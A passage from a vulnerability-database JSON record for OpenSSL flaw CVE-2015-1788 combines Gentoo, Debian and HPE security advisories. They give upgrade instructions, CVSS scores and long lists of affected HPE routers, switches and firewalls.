          {
            "author": "VULMON",
            "id": "CVE-2015-1788",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-1788"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-003080"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-1788"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to cause a denial-of-service condition. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/openssl             \u003c 1.0.1o               \u003e= 0.9.8z_p7\n                                                            \u003e= 1.0.1o\n\nDescription\n===========\n\nMultiple vulnerabilities have been found in OpenSSL. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll OpenSSL 1.0.1 users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1o\"\n\nAll OpenSSL 0.9.8 users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8z_p7\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-8176\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8176\n[ 2 ] CVE-2015-1788\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1788\n[ 3 ] CVE-2015-1789\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1789\n[ 4 ] CVE-2015-1790\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1790\n[ 5 ] CVE-2015-1791\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1791\n[ 6 ] CVE-2015-1792\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1792\n[ 7 ] CVE-2015-4000\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201506-02\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. This could allow remote attackers to cause a denial of service\n    (crash) or potentially execute arbitrary code. This\n    could allow remote attackers to cause a denial of service. This could allow remote attackers to cause a denial of\n    service (crash) via crafted ASN.1-encoded PKCS#7 blobs. This could allow remote attackers to cause\n    a denial of service (crash). This could allow remote attackers to cause\n    a denial of service. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.0.1e-2+deb7u17. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1k-3+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 1.0.2b-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2b-1. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c05184351\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05184351\nVersion: 1\n\nHPSBHF03613 rev.1 - HPE Network Products including iMC, VCX, and Comware\nusing OpenSSL, Remote Denial of Service (DoS), Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-07-05\nLast Updated: 2016-07-05\n\nPotential Security Impact: Remote Denial of Service (DoS), Unauthorized\nAccess\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities in OpenSSL have been addressed with HPE\nnetwork products including iMC, VCX, Comware 5 and Comware 7. The\nvulnerabilities could be exploited remotely resulting in Denial of Service\n(DoS) or unauthorized access. \n\nPlease refer to the RESOLUTION\n below for a list of impacted products. \n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2014-8176\n      7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n      7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n    CVE-2015-1788\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-1789\n      3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L\n      4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-1790\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-1791\n      5.6 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L\n      6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n    CVE-2015-1792\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n    CVE-2015-1793\n      6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n      6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\n      https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docI\nd=emr_na-c01345499\n\nRESOLUTION\nHPE has released the following software updates to resolve the\nvulnerabilities in the HP network products including iMC, VCX, Comware 5 and\nComware 7. \n\n**COMWARE 5 Products**\n\n  + **A6600 (Comware 5) - Version: R3303P23**\n    * HP Network Products\n      - JC165A HP 6600 RPE-X1 Router Module\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n      - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n      - JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n  + **HSR6602 (Comware 5) - Version: R3303P23**\n    * HP Network Products\n      - JC176A HP 6602 Router Chassis\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n      - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n      - JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit\n  + **HSR6800 (Comware 5) - Version: R3303P23**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n  + **MSR20 (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JD432A HP A-MSR20-21 Router\n      - JD662A HP MSR20-20 Router\n      - JD663A HP A-MSR20-21 Router\n      - JD663B HP MSR20-21 Router\n      - JD664A HP MSR20-40 Router\n      - JF228A HP MSR20-40 Router\n      - JF283A HP MSR20-20 Router\n  + **MSR20-1X  (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JD431A HP MSR20-10 Router\n      - JD667A HP MSR20-15 IW Multi-Service Router\n      - JD668A HP MSR20-13 Multi-Service Router\n      - JD669A HP MSR20-13 W Multi-Service Router\n      - JD670A HP MSR20-15 A Multi-Service Router\n      - JD671A HP MSR20-15 AW Multi-Service Router\n      - JD672A HP MSR20-15 I Multi-Service Router\n      - JD673A HP MSR20-11 Multi-Service Router\n      - JD674A HP MSR20-12 Multi-Service Router\n      - JD675A HP MSR20-12 W Multi-Service Router\n      - JD676A HP MSR20-12 T1 Multi-Service Router\n      - JF236A HP MSR20-15-I Router\n      - JF237A HP MSR20-15-A Router\n      - JF238A HP MSR20-15-I-W Router\n      - JF239A HP MSR20-11 Router\n      - JF240A HP MSR20-13 Router\n      - JF241A HP MSR20-12 Router\n      - JF806A HP MSR20-12-T Router\n      - JF807A HP MSR20-12-W Router\n      - JF808A HP MSR20-13-W Router\n      - JF809A HP MSR20-15-A-W Router\n      - JF817A HP MSR20-15 Router\n      - JG209A HP MSR20-12-T-W Router (NA)\n      - JG210A HP MSR20-13-W Router (NA)\n  + **MSR 30 (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JD654A HP MSR30-60 POE Multi-Service Router\n      - JD657A HP MSR30-40 Multi-Service Router\n      - JD658A HP MSR30-60 Multi-Service Router\n      - JD660A HP MSR30-20 POE Multi-Service Router\n      - JD661A HP MSR30-40 POE Multi-Service Router\n      - JD666A HP MSR30-20 Multi-Service Router\n      - JF229A HP MSR30-40 Router\n      - JF230A HP MSR30-60 Router\n      - JF232A HP RTMSR3040-AC-OVSAS-H3\n      - JF235A HP MSR30-20 DC Router\n      - JF284A HP MSR30-20 Router\n      - JF287A HP MSR30-40 DC Router\n      - JF801A HP MSR30-60 DC Router\n      - JF802A HP MSR30-20 PoE Router\n      - JF803A HP MSR30-40 PoE Router\n      - JF804A HP MSR30-60 PoE Router\n      - JG728A HP MSR30-20 TAA-compliant DC Router\n      - JG729A HP MSR30-20 TAA-compliant Router\n  + **MSR 30-16 (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JD659A HP MSR30-16 POE Multi-Service Router\n      - JD665A HP MSR30-16 Multi-Service Router\n      - JF233A HP MSR30-16 Router\n      - JF234A HP MSR30-16 PoE Router\n  + **MSR 30-1X (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JF800A HP MSR30-11 Router\n      - JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\n      - JG182A HP MSR30-11E Router\n      - JG183A HP MSR30-11F Router\n      - JG184A HP MSR30-10 DC Router\n  + **MSR 50 (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JD433A HP MSR50-40 Router\n      - JD653A HP MSR50 Processor Module\n      - JD655A HP MSR50-40 Multi-Service Router\n      - JD656A HP MSR50-60 Multi-Service Router\n      - JF231A HP MSR50-60 Router\n      - JF285A HP MSR50-40 DC Router\n      - JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n  + **MSR 50-G2 (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JD429A HP MSR50 G2 Processor Module\n      - JD429B HP MSR50 G2 Processor Module\n  + **MSR 9XX (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JF812A HP MSR900 Router\n      - JF813A HP MSR920 Router\n      - JF814A HP MSR900-W Router\n      - JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr\n      - JG207A HP MSR900-W Router (NA)\n      - JG208A HP MSR920-W Router (NA)\n  + **MSR 93X (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JG511A HP MSR930 Router\n      - JG511B HP MSR930 Router\n      - JG512A HP MSR930 Wireless Router\n      - JG513A HP MSR930 3G Router\n      - JG513B HP MSR930 3G Router\n      - JG514A HP MSR931 Router\n      - JG514B HP MSR931 Router\n      - JG515A HP MSR931 3G Router\n      - JG516A HP MSR933 Router\n      - JG517A HP MSR933 3G Router\n      - JG518A HP MSR935 Router\n      - JG518B HP MSR935 Router\n      - JG519A HP MSR935 Wireless Router\n      - JG520A HP MSR935 3G Router\n      - JG531A HP MSR931 Dual 3G Router\n      - JG531B HP MSR931 Dual 3G Router\n      - JG596A HP MSR930 4G LTE/3G CDMA Router\n      - JG597A HP MSR936 Wireless Router\n      - JG665A HP MSR930 4G LTE/3G WCDMA Global Router\n      - JG704A HP MSR930 4G LTE/3G WCDMA  ATT Router\n      - JH009A HP MSR931 Serial (TI) Router\n      - JH010A HP MSR933 G.SHDSL (TI) Router\n      - JH011A HP MSR935 ADSL2+ (TI) Router\n      - JH012A HP MSR930 Wireless 802.11n (NA) Router\n      - JH012B HP MSR930 Wireless 802.11n (NA) Router\n      - JH013A HP MSR935 Wireless 802.11n (NA) Router\n  + **MSR1000 (Comware 5) - Version: R2514P10**\n    * HP Network Products\n      - JG732A HP MSR1003-8 AC Router\n  + **12500 (Comware 5) - Version: R1829P01**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JC808A HP 12500 TAA Main Processing Unit\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n  + **9500E (Comware 5) - Version: R1829P01**\n    * HP Network Products\n      - JC124A HP A9508 Switch Chassis\n      - JC124B HP 9505 Switch Chassis\n      - JC125A HP A9512 Switch Chassis\n      - JC125B HP 9512 Switch Chassis\n      - JC474A HP A9508-V Switch Chassis\n      - JC474B HP 9508-V Switch Chassis\n  + **10500 (Comware 5) - Version: R1210P01**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC614A HP 10500 Main Processing Unit\n      - JC748A HP 10512 Switch Chassis\n      - JG375A HP 10500 TAA-compliant Main Processing Unit\n      - JG820A HP 10504 TAA-compliant Switch Chassis\n      - JG821A HP 10508 TAA-compliant Switch Chassis\n      - JG822A HP 10508-V TAA-compliant Switch Chassis\n      - JG823A HP 10512 TAA-compliant Switch Chassis\n  + **7500 (Comware 5) - Version: R6710P01**\n    * HP Network Products\n      - JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port\nGig-T/4-port GbE Combo\n      - JC697A HP 7502 TAA-compliant Main Processing Unit\n      - JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8\nGbE Combo Ports\n      - JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP\nPorts\n      - JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit\n      - JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit\n      - JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports\n      - JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports\n      - JD194A HP 7500 384Gbps Fabric Module\n      - JD194B HP 7500 384Gbps Fabric Module\n      - JD195A HP 7500 384Gbps Advanced Fabric Module\n      - JD196A HP 7502 Fabric Module\n      - JD220A HP 7500 768Gbps Fabric Module\n      - JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports\n      - JD238A HP 7510 Switch Chassis\n      - JD238B HP 7510 Switch Chassis\n      - JD239A HP 7506 Switch Chassis\n      - JD239B HP 7506 Switch Chassis\n      - JD240A HP 7503 Switch Chassis\n      - JD240B HP 7503 Switch Chassis\n      - JD241A HP 7506-V Switch Chassis\n      - JD241B HP 7506-V Switch Chassis\n      - JD242A HP 7502 Switch Chassis\n      - JD242B HP 7502 Switch Chassis\n      - JD243A HP 7503-S Switch Chassis with 1 Fabric Slot\n      - JD243B HP 7503-S Switch Chassis with 1 Fabric Slot\n      - JE164A HP E7902 Switch Chassis\n      - JE165A HP E7903 Switch Chassis\n      - JE166A HP E7903 1 Fabric Slot Switch Chassis\n      - JE167A HP E7906 Switch Chassis\n      - JE168A HP E7906 Vertical Switch Chassis\n      - JE169A HP E7910 Switch Chassis\n  + **5830 (Comware 5) - Version: R1118P13**\n    * HP Network Products\n      - JC691A HP 5830AF-48G Switch with 1 Interface Slot\n      - JC694A HP 5830AF-96G Switch\n      - JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot\n      - JG374A HP 5830AF-96G TAA-compliant Switch\n  + **5800 (Comware 5) - Version: R1809P11**\n    * HP Network Products\n      - JC099A HP 5800-24G-PoE Switch\n      - JC099B HP 5800-24G-PoE+ Switch\n      - JC100A HP 5800-24G Switch\n      - JC100B HP 5800-24G Switch\n      - JC101A HP 5800-48G Switch with 2 Slots\n      - JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots\n      - JC103A HP 5800-24G-SFP Switch\n      - JC103B HP 5800-24G-SFP Switch with 1 Interface Slot\n      - JC104A HP 5800-48G-PoE Switch\n      - JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot\n      - JC105A HP 5800-48G Switch\n      - JC105B HP 5800-48G Switch with 1 Interface Slot\n      - JG254A HP 5800-24G-PoE+ TAA-compliant Switch\n      - JG254B HP 5800-24G-PoE+ TAA-compliant Switch\n      - JG255A HP 5800-24G TAA-compliant Switch\n      - JG255B HP 5800-24G TAA-compliant Switch\n      - JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n      - JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot\n      - JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n      - JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot\n      - JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n      - JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot\n      - JG225A HP 5800AF-48G Switch\n      - JG225B HP 5800AF-48G Switch\n      - JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots\n      - JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface\n      - JG243A HP 5820-24XG-SFP+ TAA-compliant Switch\n      - JG243B HP 5820-24XG-SFP+ TAA-compliant Switch\n      - JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\n\u0026 1 OAA Slot\n      - JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots\nand 1 OAA Slot\n      - JC106A HP 5820-14XG-SFP+ Switch with 2 Slots\n      - JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot\n      - JG219A HP 5820AF-24XG Switch\n      - JG219B HP 5820AF-24XG Switch\n      - JC102A HP 5820-24XG-SFP+ Switch\n      - JC102B HP 5820-24XG-SFP+ Switch\n  + **5500 HI (Comware 5) - Version: R5501P17**\n    * HP Network Products\n      - JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots\n      - JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots\n      - JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots\n      - JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots\n      - JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots\n      - JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n      - JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface\nSlots\n      - JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n  + **5500 EI (Comware 5) - Version: R2221P19**\n    * HP Network Products\n      - JD373A HP 5500-24G DC EI Switch\n      - JD374A HP 5500-24G-SFP EI Switch\n      - JD375A HP 5500-48G EI Switch\n      - JD376A HP 5500-48G-PoE EI Switch\n      - JD377A HP 5500-24G EI Switch\n      - JD378A HP 5500-24G-PoE EI Switch\n      - JD379A HP 5500-24G-SFP DC EI Switch\n      - JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots\n      - JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots\n      - JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface\n      - JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots\n      - JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots\n      - JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n      - JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface\nSlots\n  + **4800G (Comware 5) - Version: R2221P19**\n    * HP Network Products\n      - JD007A HP 4800-24G Switch\n      - JD008A HP 4800-24G-PoE Switch\n      - JD009A HP 4800-24G-SFP Switch\n      - JD010A HP 4800-48G Switch\n      - JD011A HP 4800-48G-PoE Switch\n  + **5500SI (Comware 5) - Version: R2221P20**\n    * HP Network Products\n      - JD369A HP 5500-24G SI Switch\n      - JD370A HP 5500-48G SI Switch\n      - JD371A HP 5500-24G-PoE SI Switch\n      - JD372A HP 5500-48G-PoE SI Switch\n      - JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots\n      - JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots\n  + **4500G (Comware 5) - Version: R2221P20**\n    * HP Network Products\n      - JF428A HP 4510-48G Switch\n      - JF847A HP 4510-24G Switch\n  + **5120 EI (Comware 5) - Version: R2221P20**\n    * HP Network Products\n      - JE066A HP 5120-24G EI Switch\n      - JE067A HP 5120-48G EI Switch\n      - JE068A HP 5120-24G EI Switch with 2 Interface Slots\n      - JE069A HP 5120-48G EI Switch with 2 Interface Slots\n      - JE070A HP 5120-24G-PoE EI 2-slot Switch\n      - JE071A HP 5120-48G-PoE EI 2-slot Switch\n      - JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots\n      - JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots\n      - JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots\n      - JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots\n      - JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots\n      - JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots\n  + **4210G (Comware 5) - Version: R2221P20**\n    * HP Network Products\n      - JF844A HP 4210-24G Switch\n      - JF845A HP 4210-48G Switch\n      - JF846A HP 4210-24G-PoE Switch\n  + **5120 SI (Comware 5) - Version: R1516**\n    * HP Network Products\n      - JE072A HP 5120-48G SI Switch\n      - JE072B HPE 5120 48G SI Switch\n      - JE073A HP 5120-16G SI Switch\n      - JE073B HPE 5120 16G SI Switch\n      - JE074A HP 5120-24G SI Switch\n      - JE074B HPE 5120 24G SI Switch\n      - JG091A HP 5120-24G-PoE+ (370W) SI Switch\n      - JG091B HPE 5120 24G PoE+ (370W) SI Switch\n      - JG092A HP 5120-24G-PoE+ (170W) SI Switch\n      - JG309B HPE 5120 8G PoE+ (180W) SI Switch\n      - JG310B HPE 5120 8G PoE+ (65W) SI Switch\n  + **3610 (Comware 5) - Version: R5319P14**\n    * HP Network Products\n      - JD335A HP 3610-48 Switch\n      - JD336A HP 3610-24-4G-SFP Switch\n      - JD337A HP 3610-24-2G-2G-SFP Switch\n      - JD338A HP 3610-24-SFP Switch\n  + **3600V2 (Comware 5) - Version: R2110P06**\n    * HP Network Products\n      - JG299A HP 3600-24 v2 EI Switch\n      - JG299B HP 3600-24 v2 EI Switch\n      - JG300A HP 3600-48 v2 EI Switch\n      - JG300B HP 3600-48 v2 EI Switch\n      - JG301A HP 3600-24-PoE+ v2 EI Switch\n      - JG301B HP 3600-24-PoE+ v2 EI Switch\n      - JG301C HP 3600-24-PoE+ v2 EI Switch\n      - JG302A HP 3600-48-PoE+ v2 EI Switch\n      - JG302B HP 3600-48-PoE+ v2 EI Switch\n      - JG302C HP 3600-48-PoE+ v2 EI Switch\n      - JG303A HP 3600-24-SFP v2 EI Switch\n      - JG303B HP 3600-24-SFP v2 EI Switch\n      - JG304A HP 3600-24 v2 SI Switch\n      - JG304B HP 3600-24 v2 SI Switch\n      - JG305A HP 3600-48 v2 SI Switch\n      - JG305B HP 3600-48 v2 SI Switch\n      - JG306A HP 3600-24-PoE+ v2 SI Switch\n      - JG306B HP 3600-24-PoE+ v2 SI Switch\n      - JG306C HP 3600-24-PoE+ v2 SI Switch\n      - JG307A HP 3600-48-PoE+ v2 SI Switch\n      - JG307B HP 3600-48-PoE+ v2 SI Switch\n      - JG307C HP 3600-48-PoE+ v2 SI Switch\n  + **3100V2-48 (Comware 5) - Version: R2110P06**\n    * HP Network Products\n      - JG315A HP 3100-48 v2 Switch\n      - JG315B HP 3100-48 v2 Switch\n  + **HP870 (Comware 5) - Version: R2607P46**\n    * HP Network Products\n      - JG723A HP 870 Unified Wired-WLAN Appliance\n      - JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance\n  + **HP850 (Comware 5) - Version: R2607P46**\n    * HP Network Products\n      - JG722A HP 850 Unified Wired-WLAN Appliance\n      - JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance\n  + **HP830 (Comware 5) - Version: R3507P46**\n    * HP Network Products\n      - JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch\n      - JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch\n      - JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch\n      - JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant\n  + **HP6000 (Comware 5) - Version: R2507P46**\n    * HP Network Products\n      - JG639A HP 10500/7500 20G Unified Wired-WLAN Module\n      - JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module\n  + **WX5004-EI (Comware 5) - Version: R2507P46**\n    * HP Network Products\n      - JD447B HP WX5002 Access Controller\n      - JD448A HP WX5004 Access Controller\n      - JD448B HP WX5004 Access Controller\n      - JD469A HP WX5004 Access Controller\n  + **SecBlade FW (Comware 5) - Version: R3181P07**\n    * HP Network Products\n      - JC635A HP 12500 VPN Firewall Module\n      - JD245A HP 9500 VPN Firewall Module\n      - JD249A HP 10500/7500 Advanced VPN Firewall Module\n      - JD250A HP 6600 Firewall Processing Router Module\n      - JD251A HP 8800 Firewall Processing Module\n      - JD255A HP 5820 VPN Firewall Module\n  + **F1000-E (Comware 5) - Version: R3181P07**\n    * HP Network Products\n      - JD272A HP F1000-E VPN Firewall Appliance\n  + **F1000-A-EI (Comware 5) - Version: R3734P08**\n    * HP Network Products\n      - JG214A HP F1000-A-EI VPN Firewall Appliance\n  + **F1000-S-EI (Comware 5) - Version: R3734P08**\n    * HP Network Products\n      - JG213A HP F1000-S-EI VPN Firewall Appliance\n  + **F5000-A (Comware 5) - Version: F3210P26**\n    * HP Network Products\n      - JD259A HP A5000-A5 VPN Firewall Chassis\n      - JG215A HP F5000 Firewall Main Processing Unit\n      - JG216A HP F5000 Firewall Standalone Chassis\n  + **U200S and CS (Comware 5) - Version: F5123P33**\n    * HP Network Products\n      - JD273A HP U200-S UTM Appliance\n  + **U200A and M (Comware 5) - Version: F5123P33**\n    * HP Network Products\n      - JD275A HP U200-A UTM Appliance\n  + **F5000-C/S (Comware 5) - Version: R3811P05**\n    * HP Network Products\n      - JG650A HP F5000-C VPN Firewall Appliance\n      - JG370A HP F5000-S VPN Firewall Appliance\n  + **SecBlade III (Comware 5) - Version: R3820P06**\n    * HP Network Products\n      - JG371A HP 12500 20Gbps VPN Firewall Module\n      - JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module\n  + **6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU**\n    * HP Network Products\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JC566A HP 6600 RSE-X1 Router Main Processing Unit\n      - JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit\n  + **6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU**\n    * HP Network Products\n      - JC165A) HP 6600 RPE-X1 Router Module\n      - JG781A) HP 6600 RPE-X1 TAA-compliant Main Processing Unit\n  + **6602 RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU**\n    * HP Network Products\n      - JC176A) HP 6602 Router Chassis\n  + **HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU**\n    * HP Network Products\n      - JC177A HP 6608 Router\n      - JC177B HP 6608 Router Chassis\n      - JC178A HP 6604 Router Chassis\n      - JC178B HP 6604 Router Chassis\n      - JC496A HP 6616 Router Chassis\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG355A HP 6600 MCP-X1 Router Main Processing Unit\n      - JG356A HP 6600 MCP-X2 Router Main Processing Unit\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n      - JG778A 